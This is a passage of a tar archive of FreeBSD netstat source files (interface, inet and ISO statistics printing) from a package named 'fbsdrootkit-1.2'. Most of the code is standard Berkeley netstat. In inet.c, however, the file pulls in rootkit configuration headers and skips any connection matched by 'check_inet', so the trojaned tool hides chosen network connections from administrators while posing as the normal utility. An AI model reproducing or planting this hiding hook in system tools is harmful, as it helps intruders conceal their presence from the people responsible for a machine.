INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)if.c 8.3 (Berkeley) 4/28/95"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "netstat.h" #define YES 1 #define NO 0 static void sidewaysintpr __P((u_int, u_long)); static void catchalarm __P((int)); /* * Print a description of the network interfaces. */ void intpr(interval, ifnetaddr) int interval; u_long ifnetaddr; { struct ifnet ifnet; union { struct ifaddr ifa; struct in_ifaddr in; struct ns_ifaddr ns; struct iso_ifaddr iso; } ifaddr; u_long ifaddraddr; struct sockaddr *sa; char name[32], tname[16]; if (ifnetaddr == 0) { printf("ifnet: symbol not defined\n"); return; } if (interval) { sidewaysintpr((unsigned)interval, ifnetaddr); return; } if (kread(ifnetaddr, (char *)&ifnetaddr, sizeof ifnetaddr)) return; printf("%-5.5s %-5.5s %-13.13s %-15.15s %8.8s %5.5s", "Name", "Mtu", "Network", "Address", "Ipkts", "Ierrs"); if (bflag) printf(" %10.10s","Ibytes"); printf(" %8.8s %5.5s", "Opkts", "Oerrs"); if (bflag) printf(" %10.10s","Obytes"); printf(" %5s", "Coll"); if (tflag) printf(" %s", "Time"); if (dflag) printf(" %s", "Drop"); putchar('\n'); ifaddraddr = 0; while (ifnetaddr || ifaddraddr) { struct sockaddr_in *sin; register char *cp; int n, m; if (ifaddraddr == 0) { if (kread(ifnetaddr, (char *)&ifnet, sizeof ifnet) || kread((u_long)ifnet.if_name, tname, 16)) return; tname[15] = '\0'; ifnetaddr = (u_long)ifnet.if_next; snprintf(name, 32, "%s%d", tname, ifnet.if_unit); if (interface != 0 && (strcmp(name, interface) != 0)) continue; cp = index(name, '\0'); if ((ifnet.if_flags&IFF_UP) == 0) *cp++ = '*'; *cp = '\0'; ifaddraddr = (u_long)ifnet.if_addrlist; } printf("%-5.5s %-5d ", name, ifnet.if_mtu); if (ifaddraddr == 0) { printf("%-13.13s ", "none"); printf("%-15.15s ", "none"); } else { if (kread(ifaddraddr, (char *)&ifaddr, sizeof ifaddr)) { ifaddraddr = 0; continue; } #define CP(x) ((char *)(x)) cp = (CP(ifaddr.ifa.ifa_addr) - CP(ifaddraddr)) + CP(&ifaddr); sa = (struct sockaddr *)cp; switch (sa->sa_family) { case AF_UNSPEC: printf("%-13.13s ", "none"); printf("%-15.15s ", "none"); break; case AF_INET: sin = (struct sockaddr_in *)sa; #ifdef notdef /* can't use inet_makeaddr because kernel * keeps nets unshifted. */ in = inet_makeaddr(ifaddr.in.ia_subnet, INADDR_ANY); printf("%-13.13s ", netname(in.s_addr, ifaddr.in.ia_subnetmask)); #else printf("%-13.13s ", netname(htonl(ifaddr.in.ia_subnet), ifaddr.in.ia_subnetmask)); #endif printf("%-15.15s ", routename(sin->sin_addr.s_addr)); break; case AF_NS: { struct sockaddr_ns *sns = (struct sockaddr_ns *)sa; u_long net; char netnum[8]; *(union ns_net *) &net = sns->sns_addr.x_net; sprintf(netnum, "%lxH", ntohl(net)); upHex(netnum); printf("ns:%-10s ", netnum); printf("%-15s ", ns_phost((struct sockaddr *)sns)); } break; case AF_LINK: { struct sockaddr_dl *sdl = (struct sockaddr_dl *)sa; cp = (char *)LLADDR(sdl); n = sdl->sdl_alen; } m = printf(""); goto hexprint; default: m = printf("(%d)", sa->sa_family); for (cp = sa->sa_len + (char *)sa; --cp > sa->sa_data && (*cp == 0);) {} n = cp - sa->sa_data + 1; cp = sa->sa_data; hexprint: while (--n >= 0) m += printf("%02x%c", *cp++ & 0xff, n > 0 ? '.' : ' '); m = 30 - m; while (m-- > 0) putchar(' '); break; } ifaddraddr = (u_long)ifaddr.ifa.ifa_next; } printf("%8d %5d ", ifnet.if_ipackets, ifnet.if_ierrors); if (bflag) printf("%10d ", ifnet.if_ibytes); printf("%8d %5d ", ifnet.if_opackets, ifnet.if_oerrors); if (bflag) printf("%10d ", ifnet.if_obytes); printf("%5d", ifnet.if_collisions); if (tflag) printf(" %3d", ifnet.if_timer); if (dflag) printf(" %3d", ifnet.if_snd.ifq_drops); putchar('\n'); } } #define MAXIF 10 struct iftot { char ift_name[16]; /* interface name */ u_int ift_ip; /* input packets */ u_int ift_ie; /* input errors */ u_int ift_op; /* output packets */ u_int ift_oe; /* output errors */ u_int ift_co; /* collisions */ u_int ift_dr; /* drops */ u_int ift_ib; /* input bytes */ u_int ift_ob; /* output bytes */ } iftot[MAXIF]; u_char signalled; /* set if alarm goes off "early" */ /* * Print a running summary of interface statistics. * Repeat display every interval seconds, showing statistics * collected over that interval. Assumes that interval is non-zero. * First line printed at top of screen is always cumulative. */ static void sidewaysintpr(interval, off) unsigned interval; u_long off; { struct ifnet ifnet; u_long firstifnet; register struct iftot *ip, *total; register int line; struct iftot *lastif, *sum, *interesting; int oldmask, first; u_long interesting_off; if (kread(off, (char *)&firstifnet, sizeof (u_long))) return; lastif = iftot; sum = iftot + MAXIF - 1; total = sum - 1; interesting = NULL; interesting_off = 0; for (off = firstifnet, ip = iftot; off;) { char *cp; char name[16], tname[16]; if (kread(off, (char *)&ifnet, sizeof ifnet)) break; if (kread((u_long)ifnet.if_name, tname, 16)) break; tname[15] = '\0'; snprintf(name, 16, "%s%d", tname, ifnet.if_unit); if (interface && strcmp(name, interface) == 0) { interesting = ip; interesting_off = off; } snprintf(ip->ift_name, 16, "(%s)", name);; ip++; if (ip >= iftot + MAXIF - 2) break; off = (u_long) ifnet.if_next; } lastif = ip; (void)signal(SIGALRM, catchalarm); signalled = NO; (void)alarm(interval); for (ip = iftot; ip < iftot + MAXIF; ip++) { ip->ift_ip = 0; ip->ift_ie = 0; ip->ift_ib = 0; ip->ift_op = 0; ip->ift_oe = 0; ip->ift_ob = 0; ip->ift_co = 0; ip->ift_dr = 0; } first = 1; banner: printf("%17s %14s %16s", "input", interesting ? interesting->ift_name : "(Total)", "output"); putchar('\n'); printf("%10s %5s %10s %10s %5s %10s %5s", "packets", "errs", "bytes", "packets", "errs", "bytes", "colls"); if (dflag) printf(" %5.5s", "drops"); putchar('\n'); fflush(stdout); line = 0; loop: if (interesting != NULL) { ip = interesting; if (kread(interesting_off, (char *)&ifnet, sizeof ifnet)) { printf("???\n"); exit(1); }; if (!first) { printf("%10u %5u %10u %10u %5u %10u %5u", ifnet.if_ipackets - ip->ift_ip, ifnet.if_ierrors - ip->ift_ie, ifnet.if_ibytes - ip->ift_ib, ifnet.if_opackets - ip->ift_op, ifnet.if_oerrors - ip->ift_oe, ifnet.if_obytes - ip->ift_ob, ifnet.if_collisions - ip->ift_co); if (dflag) printf(" %5u", ifnet.if_snd.ifq_drops - ip->ift_dr); } ip->ift_ip = ifnet.if_ipackets; ip->ift_ie = ifnet.if_ierrors; ip->ift_ib = ifnet.if_ibytes; ip->ift_op = ifnet.if_opackets; ip->ift_oe = ifnet.if_oerrors; ip->ift_ob = ifnet.if_obytes; ip->ift_co = ifnet.if_collisions; ip->ift_dr = ifnet.if_snd.ifq_drops; } else { sum->ift_ip = 0; sum->ift_ie = 0; sum->ift_ib = 0; sum->ift_op = 0; sum->ift_oe = 0; sum->ift_ob = 0; sum->ift_co = 0; sum->ift_dr = 0; for (off = firstifnet, ip = iftot; off && ip < lastif; ip++) { if (kread(off, (char *)&ifnet, sizeof ifnet)) { off = 0; continue; } sum->ift_ip += ifnet.if_ipackets; sum->ift_ie += ifnet.if_ierrors; sum->ift_ib += ifnet.if_ibytes; sum->ift_op += ifnet.if_opackets; sum->ift_oe += ifnet.if_oerrors; sum->ift_ob += ifnet.if_obytes; sum->ift_co += ifnet.if_collisions; sum->ift_dr += ifnet.if_snd.ifq_drops; off = (u_long) ifnet.if_next; } if (!first) { printf("%10u %5u %10u %10u %5u %10u %5u", sum->ift_ip - total->ift_ip, sum->ift_ie - total->ift_ie, sum->ift_ib - total->ift_ib, sum->ift_op - total->ift_op, sum->ift_oe - total->ift_oe, sum->ift_ob - total->ift_ob, sum->ift_co - total->ift_co); if (dflag) printf(" %5u", sum->ift_dr - total->ift_dr); } *total = *sum; } if (!first) putchar('\n'); fflush(stdout); oldmask = sigblock(sigmask(SIGALRM)); if (! signalled) { sigpause(0); } sigsetmask(oldmask); signalled = NO; (void)alarm(interval); line++; first = 0; if (line == 21) goto banner; else goto loop; /*NOTREACHED*/ } /* * Called if an interval expires before sidewaysintpr has completed a loop. * Sets a flag to not wait for the alarm. */ static void catchalarm(signo) int signo; { signalled = YES; } fbsdrootkit-1.2/netstat/inet.c100600 764 0 40030 6257601665 14263 0ustar dfroot/* * Copyright (c) 1983, 1988, 1993, 1995 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)inet.c 8.5 (Berkeley) 5/24/95"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define TCPSTATES #include #include #include #include #include #include #include #include #include #include #include #include "netstat.h" /* Rootkit configuration files */ #include "../config.h" #define INET_DOT_C #include "../rootkitnetstat.h" struct inpcb inpcb; struct tcpcb tcpcb; struct socket sockb; char *inetname __P((struct in_addr *)); void inetprint __P((struct in_addr *, int, char *, int)); /* * Print a summary of connections related to an Internet * protocol. For TCP, also give state of connection. * Listening processes (aflag) are suppressed unless the * -a (all) flag is specified. */ void protopr(off, name) u_long off; char *name; { struct inpcbhead head; register struct inpcb *prev, *next; int istcp; static int first = 1; if (off == 0) return; istcp = strcmp(name, "tcp") == 0; kread(off, (char *)&head, sizeof (struct inpcbhead)); prev = (struct inpcb *)off; for (next = head.lh_first; next != NULL; next = inpcb.inp_list.le_next) { if (kread((u_long)next, (char *)&inpcb, sizeof (inpcb))) { printf("???\n"); break; } if (!aflag && inet_lnaof(inpcb.inp_laddr) == INADDR_ANY) { prev = next; continue; } if (kread((u_long)inpcb.inp_socket, (char *)&sockb, sizeof (sockb))) { printf("???\n"); break; }; if (istcp) { if (kread((u_long)inpcb.inp_ppcb, (char *)&tcpcb, sizeof (tcpcb))) { printf("???\n"); break; }; } if (first) { printf("Active Internet connections"); if (aflag) printf(" (including servers)"); putchar('\n'); if (Aflag) printf("%-8.8s ", "PCB"); printf(Aflag ? "%-5.5s %-6.6s %-6.6s %-18.18s %-18.18s %s\n" : "%-5.5s %-6.6s %-6.6s %-22.22s %-22.22s %s\n", "Proto", "Recv-Q", "Send-Q", "Local Address", "Foreign Address", "(state)"); first = 0; } /* Check to see if connection should be blocked */ if(showall || !check_inet(inpcb)) { if (Aflag) if (istcp) printf("%8x ", (int)inpcb.inp_ppcb); else printf("%8x ", (int)next); printf("%-5.5s %6ld %6ld ", name, sockb.so_rcv.sb_cc, sockb.so_snd.sb_cc); if (nflag) { inetprint(&inpcb.inp_laddr, (int)inpcb.inp_lport, name, 1); inetprint(&inpcb.inp_faddr, (int)inpcb.inp_fport, name, 1); } else { inetprint(&inpcb.inp_laddr, (int)inpcb.inp_lport, name, 0); inetprint(&inpcb.inp_faddr, (int)inpcb.inp_fport, name, inpcb.inp_lport != inpcb.inp_fport); } if (istcp) { if (tcpcb.t_state < 0 || tcpcb.t_state >= TCP_NSTATES) printf(" %d", tcpcb.t_state); else { printf(" %s", tcpstates[tcpcb.t_state]); #if defined(TF_NEEDSYN) && defined(TF_NEEDFIN) /* Show T/TCP `hidden state' */ if (tcpcb.t_flags & (TF_NEEDSYN|TF_NEEDFIN)) putchar('*'); #endif /* defined(TF_NEEDSYN) && defined(TF_NEEDFIN) */ } } putchar('\n'); } prev = next; } } /* * Dump TCP statistics structure. */ void tcp_stats(off, name) u_long off; char *name; { struct tcpstat tcpstat; if (off == 0) return; printf ("%s:\n", name); kread(off, (char *)&tcpstat, sizeof (tcpstat)); #define p(f, m) if (tcpstat.f || sflag <= 1) \ printf(m, tcpstat.f, plural(tcpstat.f)) #define p2(f1, f2, m) if (tcpstat.f1 || tcpstat.f2 || sflag <= 1) \ printf(m, tcpstat.f1, plural(tcpstat.f1), tcpstat.f2, plural(tcpstat.f2)) #define p3(f, m) if (tcpstat.f || sflag <= 1) \ printf(m, tcpstat.f, plurales(tcpstat.f)) p(tcps_sndtotal, "\t%ld packet%s sent\n"); p2(tcps_sndpack,tcps_sndbyte, "\t\t%ld data packet%s (%ld byte%s)\n"); p2(tcps_sndrexmitpack, tcps_sndrexmitbyte, "\t\t%ld data packet%s (%ld byte%s) retransmitted\n"); /* Why are these here in the first place? */ /* p(tcps_mturesent, "\t\t%ld resend%s initiated by MTU discovery\n"); */ p2(tcps_sndacks, tcps_delack, "\t\t%ld ack-only packet%s (%ld delayed)\n"); p(tcps_sndurg, "\t\t%ld URG only packet%s\n"); p(tcps_sndprobe, "\t\t%ld window probe packet%s\n"); p(tcps_sndwinup, "\t\t%ld window update packet%s\n"); p(tcps_sndctrl, "\t\t%ld control packet%s\n"); p(tcps_rcvtotal, "\t%ld packet%s received\n"); p2(tcps_rcvackpack, tcps_rcvackbyte, "\t\t%ld ack%s (for %ld byte%s)\n"); p(tcps_rcvdupack, "\t\t%ld duplicate ack%s\n"); p(tcps_rcvacktoomuch, "\t\t%ld ack%s for unsent data\n"); p2(tcps_rcvpack, tcps_rcvbyte, "\t\t%ld packet%s (%ld byte%s) received in-sequence\n"); p2(tcps_rcvduppack, tcps_rcvdupbyte, "\t\t%ld completely duplicate packet%s (%ld byte%s)\n"); p(tcps_pawsdrop, "\t\t%ld old duplicate packet%s\n"); p2(tcps_rcvpartduppack, tcps_rcvpartdupbyte, "\t\t%ld packet%s with some dup. data (%ld byte%s duped)\n"); p2(tcps_rcvoopack, tcps_rcvoobyte, "\t\t%ld out-of-order packet%s (%ld byte%s)\n"); p2(tcps_rcvpackafterwin, tcps_rcvbyteafterwin, "\t\t%ld packet%s (%ld byte%s) of data after window\n"); p(tcps_rcvwinprobe, "\t\t%ld window probe%s\n"); p(tcps_rcvwinupd, "\t\t%ld window update packet%s\n"); p(tcps_rcvafterclose, "\t\t%ld packet%s received after close\n"); p(tcps_rcvbadsum, "\t\t%ld discarded for bad checksum%s\n"); p(tcps_rcvbadoff, "\t\t%ld discarded for bad header offset field%s\n"); p(tcps_rcvshort, "\t\t%ld discarded because packet too short\n"); p(tcps_connattempt, "\t%ld connection request%s\n"); p(tcps_accepts, "\t%ld connection accept%s\n"); /* Ditto */ /* p(tcps_badsyn, "\t%ld bad connection attempt%s\n"); */ /* p(tcps_listendrop, "\t%ld listen queue overflow%s\n"); */ p(tcps_connects, "\t%ld connection%s established (including accepts)\n"); p2(tcps_closed, tcps_drops, "\t%ld connection%s closed (including %ld drop%s)\n"); p(tcps_cachedrtt, "\t\t%ld connection%s updated cached RTT on close\n"); p(tcps_cachedrttvar, "\t\t%ld connection%s updated cached RTT variance on close\n"); p(tcps_cachedssthresh, "\t\t%ld connection%s updated cached ssthresh on close\n"); p(tcps_conndrops, "\t%ld embryonic connection%s dropped\n"); p2(tcps_rttupdated, tcps_segstimed, "\t%ld segment%s updated rtt (of %ld attempt%s)\n"); p(tcps_rexmttimeo, "\t%ld retransmit timeout%s\n"); p(tcps_timeoutdrop, "\t\t%ld connection%s dropped by rexmit timeout\n"); p(tcps_persisttimeo, "\t%ld persist timeout%s\n"); p(tcps_persistdrop, "\t\t%ld connection%s dropped by persist timeout\n"); p(tcps_keeptimeo, "\t%ld keepalive timeout%s\n"); p(tcps_keepprobe, "\t\t%ld keepalive probe%s sent\n"); p(tcps_keepdrops, "\t\t%ld connection%s dropped by keepalive\n"); p(tcps_predack, "\t%ld correct ACK header prediction%s\n"); p(tcps_preddat, "\t%ld correct data packet header prediction%s\n"); #undef p #undef p2 #undef p3 } /* * Dump UDP statistics structure. */ void udp_stats(off, name) u_long off; char *name; { struct udpstat udpstat; u_long delivered; if (off == 0) return; kread(off, (char *)&udpstat, sizeof (udpstat)); printf("%s:\n", name); #define p(f, m) if (udpstat.f || sflag <= 1) \ printf(m, udpstat.f, plural(udpstat.f)) p(udps_ipackets, "\t%lu datagram%s received\n"); p(udps_hdrops, "\t%lu with incomplete header\n"); p(udps_badlen, "\t%lu with bad data length field\n"); p(udps_badsum, "\t%lu with bad checksum\n"); p(udps_noport, "\t%lu dropped due to no socket\n"); p(udps_noportbcast, "\t%lu broadcast/multicast datagram%s dropped due to no socket\n"); p(udps_fullsock, "\t%lu dropped due to full socket buffers\n"); /* ??? */ /* p(udpps_pcbhashmiss, "\t%lu not for hashed pcb\n"); */ delivered = udpstat.udps_ipackets - udpstat.udps_hdrops - udpstat.udps_badlen - udpstat.udps_badsum - udpstat.udps_noport - udpstat.udps_noportbcast - udpstat.udps_fullsock; if (delivered || sflag <= 1) printf("\t%lu delivered\n", delivered); p(udps_opackets, "\t%lu datagram%s output\n"); #undef p } /* * Dump IP statistics structure. */ void ip_stats(off, name) u_long off; char *name; { struct ipstat ipstat; if (off == 0) return; kread(off, (char *)&ipstat, sizeof (ipstat)); printf("%s:\n", name); #define p(f, m) if (ipstat.f || sflag <= 1) \ printf(m, ipstat.f, plural(ipstat.f)) p(ips_total, "\t%lu total packet%s received\n"); p(ips_badsum, "\t%lu bad header checksum%s\n"); p(ips_toosmall, "\t%lu with size smaller than minimum\n"); p(ips_tooshort, "\t%lu with data size < data length\n"); p(ips_badhlen, "\t%lu with header length < data size\n"); p(ips_badlen, "\t%lu with data length < header length\n"); p(ips_badoptions, "\t%lu with bad options\n"); p(ips_badvers, "\t%lu with incorrect version number\n"); p(ips_fragments, "\t%lu fragment%s received\n"); p(ips_fragdropped, "\t%lu fragment%s dropped (dup or out of space)\n"); p(ips_fragtimeout, "\t%lu fragment%s dropped after timeout\n"); p(ips_reassembled, "\t%lu packet%s reassembled ok\n"); p(ips_delivered, "\t%lu packet%s for this host\n"); p(ips_noproto, "\t%lu packet%s for unknown/unsupported protocol\n"); p(ips_forward, "\t%lu packet%s forwarded\n"); p(ips_cantforward, "\t%lu packet%s not forwardable\n"); p(ips_redirectsent, "\t%lu redirect%s sent\n"); p(ips_localout, "\t%lu packet%s sent from this host\n"); p(ips_rawout, "\t%lu packet%s sent with fabricated ip header\n"); p(ips_odropped, "\t%lu output packet%s dropped due to no bufs, etc.\n"); p(ips_noroute, "\t%lu output packet%s discarded due to no route\n"); p(ips_fragmented, "\t%lu output datagram%s fragmented\n"); p(ips_ofragments, "\t%lu fragment%s created\n"); p(ips_cantfrag, "\t%lu datagram%s that can't be fragmented\n"); #undef p } static char *icmpnames[] = { "echo reply", "#1", "#2", "destination unreachable", "source quench", "routing redirect", "#6", "#7", "echo", "router advertisement", "router solicitation", "time exceeded", "parameter problem", "time stamp", "time stamp reply", "information request", "information request reply", "address mask request", "address mask reply", }; /* * Dump ICMP statistics. */ void icmp_stats(off, name) u_long off; char *name; { struct icmpstat icmpstat; register int i, first; if (off == 0) return; kread(off, (char *)&icmpstat, sizeof (icmpstat)); printf("%s:\n", name); #define p(f, m) if (icmpstat.f || sflag <= 1) \ printf(m, icmpstat.f, plural(icmpstat.f)) p(icps_error, "\t%lu call%s to icmp_error\n"); p(icps_oldicmp, "\t%lu error%s not generated 'cuz old message was icmp\n"); for (first = 1, i = 0; i < ICMP_MAXTYPE + 1; i++) if (icmpstat.icps_outhist[i] != 0) { if (first) { printf("\tOutput histogram:\n"); first = 0; } printf("\t\t%s: %lu\n", icmpnames[i], icmpstat.icps_outhist[i]); } p(icps_badcode, "\t%lu message%s with bad code fields\n"); p(icps_tooshort, "\t%lu message%s < minimum length\n"); p(icps_checksum, "\t%lu bad checksum%s\n"); p(icps_badlen, "\t%lu message%s with bad length\n"); for (first = 1, i = 0; i < ICMP_MAXTYPE + 1; i++) if (icmpstat.icps_inhist[i] != 0) { if (first) { printf("\tInput histogram:\n"); first = 0; } printf("\t\t%s: %lu\n", icmpnames[i], icmpstat.icps_inhist[i]); } p(icps_reflect, "\t%lu message response%s generated\n"); #undef p } /* * Dump IGMP statistics structure. */ void igmp_stats(off, name) u_long off; char *name; { struct igmpstat igmpstat; if (off == 0) return; kread(off, (char *)&igmpstat, sizeof (igmpstat)); printf("%s:\n", name); #define p(f, m) if (igmpstat.f || sflag <= 1) \ printf(m, igmpstat.f, plural(igmpstat.f)) #define py(f, m) if (igmpstat.f || sflag <= 1) \ printf(m, igmpstat.f, igmpstat.f != 1 ? "ies" : "y") p(igps_rcv_total, "\t%u message%s received\n"); p(igps_rcv_tooshort, "\t%u message%s received with too few bytes\n"); p(igps_rcv_badsum, "\t%u message%s received with bad checksum\n"); py(igps_rcv_queries, "\t%u membership quer%s received\n"); py(igps_rcv_badqueries, "\t%u membership quer%s received with invalid field(s)\n"); p(igps_rcv_reports, "\t%u membership report%s received\n"); p(igps_rcv_badreports, "\t%u membership report%s received with invalid field(s)\n"); p(igps_rcv_ourreports, "\t%u membership report%s received for groups to which we belong\n"); p(igps_snd_reports, "\t%u membership report%s sent\n"); #undef p #undef py } /* * Pretty print an Internet address (net address + port). */ void inetprint(in, port, proto,numeric) register struct in_addr *in; int port; char *proto; int numeric; { struct servent *sp = 0; char line[80], *cp; int width; sprintf(line, "%.*s.", (Aflag && !numeric) ? 12 : 16, inetname(in)); cp = index(line, '\0'); if (!numeric && port) sp = getservbyport((int)port, proto); if (sp || port == 0) sprintf(cp, "%.15s", sp ? sp->s_name : "*"); else sprintf(cp, "%d", ntohs((u_short)port)); width = Aflag ? 18 : 22; printf(" %-*.*s", width, width, line); } /* * Construct an Internet address representation. * If the nflag has been supplied, give * numeric value, otherwise try for symbolic name. */ char * inetname(inp) struct in_addr *inp; { register char *cp; static char line[50]; struct hostent *hp; struct netent *np; cp = 0; if (!nflag && inp->s_addr != INADDR_ANY) { int net = inet_netof(*inp); int lna = inet_lnaof(*inp); if (lna == INADDR_ANY) { np = getnetbyaddr(net, AF_INET); if (np) cp = np->n_name; } if (cp == 0) { hp = gethostbyaddr((char *)inp, sizeof (*inp), AF_INET); if (hp) { cp = hp->h_name; trimdomain(cp); } } } if (inp->s_addr == INADDR_ANY) strcpy(line, "*"); else if (cp) strcpy(line, cp); else { inp->s_addr = ntohl(inp->s_addr); #define C(x) ((x) & 0xff) sprintf(line, "%lu.%lu.%lu.%lu", C(inp->s_addr >> 24), C(inp->s_addr >> 16), C(inp->s_addr >> 8), C(inp->s_addr)); } return (line); } fbsdrootkit-1.2/netstat/iso.c100600 764 0 57022 6155205223 14112 0ustar dfroot/* * Copyright (c) 1983, 1988, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)iso.c 8.1 (Berkeley) 6/6/93"; #endif /* not lint */ /* * $Header: /home/ncvs/src/usr.bin/netstat/iso.c,v 1.2.4.1 1996/06/05 02:57:17 jkh Exp $ * $Source: /home/ncvs/src/usr.bin/netstat/iso.c,v $ */ /******************************************************************************* Copyright IBM Corporation 1987 All Rights Reserved Permission to use, copy, modify, and distribute this software and its documentation for any purpose and without fee is hereby granted, provided that the above copyright notice appear in all copies and that both that copyright notice and this permission notice appear in supporting documentation, and that the name of IBM not be used in advertising or publicity pertaining to distribution of the software without specific, written prior permission. IBM DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL IBM BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. *******************************************************************************/ /* * ARGO Project, Computer Sciences Dept., University of Wisconsin - Madison */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #undef satosiso #include #include #include #include #include #include #include #ifdef IncStat #undef IncStat #endif #include #include #include #include #include #include #include "netstat.h" static void tprintstat __P((struct tp_stat *, int)); static void isonetprint __P((struct sockaddr_iso *, int)); static void hexprint __P((int, char *, char *)); extern void inetprint __P((struct in_addr *, int, char *)); /* * Dump esis stats */ void esis_stats(off, name) u_long off; char *name; { struct esis_stat esis_stat; if (off == 0 || kread(off, (char *)&esis_stat, sizeof (struct esis_stat))) return; printf("%s:\n", name); printf("\t%d esh sent, %d esh received\n", esis_stat.es_eshsent, esis_stat.es_eshrcvd); printf("\t%d ish sent, %d ish received\n", esis_stat.es_ishsent, esis_stat.es_ishrcvd); printf("\t%d rd sent, %d rd received\n", esis_stat.es_rdsent, esis_stat.es_rdrcvd); printf("\t%d pdus not sent due to insufficient memory\n", esis_stat.es_nomem); printf("\t%d pdus received with bad checksum\n", esis_stat.es_badcsum); printf("\t%d pdus received with bad version number\n", esis_stat.es_badvers); printf("\t%d pdus received with bad type field\n", esis_stat.es_badtype); printf("\t%d short pdus received\n", esis_stat.es_toosmall); } /* * Dump clnp statistics structure. */ void clnp_stats(off, name) u_long off; char *name; { struct clnp_stat clnp_stat; if (off == 0 || kread(off, (char *)&clnp_stat, sizeof (clnp_stat))) return; printf("%s:\n\t%d total packets sent\n", name, clnp_stat.cns_sent); printf("\t%d total fragments sent\n", clnp_stat.cns_fragments); printf("\t%d total packets received\n", clnp_stat.cns_total); printf("\t%d with fixed part of header too small\n", clnp_stat.cns_toosmall); printf("\t%d with header length not reasonable\n", clnp_stat.cns_badhlen); printf("\t%d incorrect checksum%s\n", clnp_stat.cns_badcsum, plural(clnp_stat.cns_badcsum)); printf("\t%d with unreasonable address lengths\n", clnp_stat.cns_badaddr); printf("\t%d with forgotten segmentation information\n", clnp_stat.cns_noseg); printf("\t%d with an incorrect protocol identifier\n", clnp_stat.cns_noproto); printf("\t%d with an incorrect version\n", clnp_stat.cns_badvers); printf("\t%d dropped because the ttl has expired\n", clnp_stat.cns_ttlexpired); printf("\t%d clnp cache misses\n", clnp_stat.cns_cachemiss); printf("\t%d clnp congestion experience bits set\n", clnp_stat.cns_congest_set); printf("\t%d clnp congestion experience bits received\n", clnp_stat.cns_congest_rcvd); } /* * Dump CLTP statistics structure. */ void cltp_stats(off, name) u_long off; char *name; { struct cltpstat cltpstat; if (off == 0 || kread(off, (char *)&cltpstat, sizeof (cltpstat))) return; printf("%s:\n\t%u incomplete header%s\n", name, cltpstat.cltps_hdrops, plural(cltpstat.cltps_hdrops)); printf("\t%u bad data length field%s\n", cltpstat.cltps_badlen, plural(cltpstat.cltps_badlen)); printf("\t%u bad checksum%s\n", cltpstat.cltps_badsum, plural(cltpstat.cltps_badsum)); } 